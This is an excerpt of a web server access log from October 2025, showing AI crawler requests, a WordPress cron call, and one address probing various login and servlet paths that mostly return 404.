20.171.207.254 - - [18/Oct/2025:11:33:42 -0400] "GET /products60903910?kg=0060161262 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:33:54 -0400] "GET /login.zul HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0"
157.20.32.210 - - [18/Oct/2025:11:33:56 -0400] "GET /api/subscriber HTTP/1.1" 404 10904 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.9"
185.61.153.107 - - [18/Oct/2025:11:34:38 -0400] "POST /wp-cron.php?doing_wp_cron=1760801678.6695070266723632812500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:11:34:46 -0400] "GET /products60882954?kg=0060140560 HTTP/1.1" 404 9744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:34:47 -0400] "GET /rest/api/latest/repos HTTP/1.1" 404 12355 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:33:06 -0400] "POST /hms/user-login.php HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_18) AppleWebKit/605.1.18 (KHTML, like Gecko) Version/18 Safari/605.1.18"
216.73.216.159 - - [18/Oct/2025:11:33:18 -0400] "GET /products7246172?kg=0007157887 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:33:55 -0400] "POST /cgi-bin/xmlstatus.cgi HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:11:34:35 -0400] "POST /servlets/OmaDsServlet HTTP/1.1" 404 10853 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
